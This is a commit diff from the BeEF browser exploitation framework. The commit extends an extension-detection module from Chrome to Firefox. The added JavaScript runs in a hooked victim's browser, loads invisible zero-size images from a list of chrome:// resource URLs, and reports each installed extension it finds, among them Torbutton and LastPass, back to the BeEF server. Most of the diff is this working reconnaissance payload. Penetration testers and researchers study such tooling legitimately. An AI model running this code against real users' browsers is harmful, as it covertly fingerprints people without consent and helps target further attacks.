Improved extension detection with the old Firefox hack #815

beefproject · Jan 6, 2013 · 87afb9a · 87afb9a
1 parent da7a7b9
commit 87afb9a
Show file tree

Hide file tree

Showing 4 changed files with 104 additions and 25 deletions.
diff --git a/...tensions/get_chrome_extensions/command.js → modules/browser/detect_extensions/command.js b/...tensions/get_chrome_extensions/command.js → modules/browser/detect_extensions/command.js
@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-	extensions = new Array(
+	chrome_extensions = new Array(
 		new Array("blpcfgokakmgnkcojhhkbfbldkacnbeo","YouTube"),
 		new Array("pjkljhegncpnkpknbcohdijeoejaedia","Gmail"),
 		new Array("coobgpohoikkiipiblmjeljniedjpjpf","Google Search"),
@@ -1009,7 +1009,61 @@ beef.execute(function() {
 		new Array("inolmjbojghkehmmlbdmpdlmagalddni","Jagran - India No.1 Hindi News Daily")
 	);
 
-	var detect = function(addon_id, addon_name) {
+        var firefox_extensions = {
+                "Adblock Plus" : "chrome://adblockplus/skin/adblockplus.png",
+                "Auto Copy" : "chrome://autocopy/skin/autocopy.png",
+                "ColorZilla" : "chrome://colorzilla/skin/logo.png",
+                "Customize Google" : "chrome://customizegoogle/skin/32x32.png",
+                "DownThemAll!" : "chrome://dta/content/immagini/icon.png",
+                "Faster Fox" : "chrome://fasterfox/skin/icon.png",
+                "Flash Block" : "chrome://flashblock/skin/flash-on-24.png",
+                "FlashGot" : "chrome://flashgot/skin/icon32.png",
+                "Forecastfox" : "chrome://forecastfox/skin/images/icon.png",
+                "Google Toolbar" : "chrome://google-toolbar/skin/icon.png",
+                "Greasemonkey" : "chrome://greasemonkey/content/status_on.gif",
+                "IE Tab" : "chrome://ietab/skin/ietab-button-ie16.png",
+                "IE View" : "chrome://ieview/skin/ieview-icon.png",
+                "JS View" : "chrome://jsview/skin/jsview.gif",
+                "Live HTTP Headers" : "chrome://livehttpheaders/skin/img/Logo.png",
+                "MeasureIt" : "chrome://measureit/skin/measureit.png",
+                "SEO For Firefox" : "chrome://seo4firefox/content/icon32.png",
+                "SEOpen" : "chrome://seopen/skin/seopen.png",
+                "Search Status" : "chrome://searchstatus/skin/cax10.png",
+                "Server Switcher" : "chrome://switcher/skin/icon.png",
+                "StumbleUpon" : "chrome://stumbleupon/content/skin/logo32.png",
+                "Tab Mix Plus" : "chrome://tabmixplus/skin/tmp.png",
+                "Torrent-Search Toolbar" : "chrome://torrent-search/skin/v.png",
+                "User Agent Switcher" : "chrome://useragentswitcher/content/logo.png",
+                "View Source With" : "chrome://viewsourcewith/skin/ff/tb16.png",
+                "Web Developer" : "chrome://webdeveloper/content/images/logo.png",
+                "Unhide Passwords" : "chrome://unhidepw/skin/unhidepw.png",
+                "UrlParams" : "chrome://urlparams/skin/urlparams32.png",
+                "NewsFox" : "chrome://newsfox/skin/images/home.png",
+                "Add N Edit Cookies" : "chrome://addneditcookies/skin/images/anec32.png",
+                "GTDGmail" : "chrome://gtdgmail/content/gtd_lineitem.png",
+                "QuickJava" : "chrome://quickjava/content/js.png",
+                "Adblock Filterset.G Updater" : "chrome://unplug/skin/unplug.png",
+                "BBCode" : "chrome://bbcode/skin/bbcode.png",
+                "BugMeNot" : "chrome://bugmenot/skin/bugmenot.png",
+                "ConQuery" : "chrome://conquery/skin/conquery.png",
+                "Download Manager Tweak" : "chrome://downloadmgr/skin/downloadIcon.png",
+                "Extended Cookie Manager" : "chrome://xcm/content/allowed.png",
+                "FireBug" : "chrome://firebug/content/firebug32.png",
+                "FoxyTunes" : "chrome://foxytunes/skin/logo.png",
+                "MR Tech Disable XPI Install Delay" : "chrome://disable_xpi_delay/content/icon.png",
+                "SessionSaver .2" : "chrome://sessionsaver/content/ss.png",
+                "spooFX" : "chrome://spoofx/skin/main/spoofx.png",
+                "Statusbar Clock" : "chrome://timestatus/skin/icon.png",
+                "Torbutton" : "chrome://torbutton/skin/bigbutton_gr.png",
+                "UnPlug" : "chrome://unplug/skin/unplug.png",
+                "View Source Chart" : "chrome://vrs/skin/vrssmall.png",
+                "XPather" : "chrome://xpather/content/iconka.png",
+                "WOT" : "chrome://wot/skin/fusion/logo.png",
+                "LastPass" : "chrome://lastpass/skin/vaultdelete.png",
+
+        };
+
+	var detect_chrome_extension = function(addon_id, addon_name) {
 		var s = document.createElement('script');
 		s.onload = function() {
 			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension='+addon_name);
@@ -1018,11 +1072,29 @@ beef.execute(function() {
 		document.body.appendChild(s);
 	}
 
-	try {
-		for (var i=0; i<extensions.length; i++) {
-			detect(extensions[i][0], extensions[i][1]);
-		}
-	} catch(e) {}
+        var detect_firefox_extension = function(addon_url, addon_name) {
+                var img = document.createElement("img");
+                img.setAttribute("border", '0');
+                img.setAttribute("width", '0');
+                img.setAttribute("height", '0');
+                img.setAttribute("onload", "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension=" + addon_name+ "');");
+                img.setAttribute("src", addon_url);
+        }
+
+        if(beef.browser.isC()) {
+                try {
+                        for (var i=0; i<chrome_extensions.length; i++) {
+                                detect_chrome_extension(chrome_extensions[i][0], chrome_extensions[i][1]);
+                        }
+                } catch(e) {}
+        } else if(beef.browser.isFF()) {
+                try {
+                        for (var i in firefox_extensions) {
+                                detect_firefox_extension(firefox_extensions[i], i);
+                        }
+                } catch(e) {}
+        } else {
+        };
 
 });
 
diff --git a/modules/browser/detect_extensions/config.yaml b/modules/browser/detect_extensions/config.yaml
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_extensions:
+            enable: true
+            category: "Browser"
+            name: "Detect Chrome/Firefox Extensions"
+            description: "This module detects Extensions in Chrome and Firefox "
+            authors: ["koto", "bcoles", "nbblrr"]
+            target:
+                working:
+                    FF:
+                        min_ver: 1
+                        max_ver: latest
+                    C:
+                        min_ver: 1
+                        max_ver: 18
+                not_working: ["All"]
diff --git a/...xtensions/get_chrome_extensions/module.rb → modules/browser/detect_extensions/module.rb b/...xtensions/get_chrome_extensions/module.rb → modules/browser/detect_extensions/module.rb
@@ -5,14 +5,15 @@
 #
 # More info:
 #	http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
+#	http://jeremiahgrossman.blogspot.fr/2006/08/i-know-what-youve-got-firefox.html
 #
-class Detect_chrome_extensions < BeEF::Core::Command
+class Detect_extensions < BeEF::Core::Command
 
   def post_execute
     content = {}
     content['extension'] = @datastore['extension']
     save content
   end
-  
+
 end
 
diff --git a/modules/chrome_extensions/get_chrome_extensions/config.yaml b/modules/chrome_extensions/get_chrome_extensions/config.yaml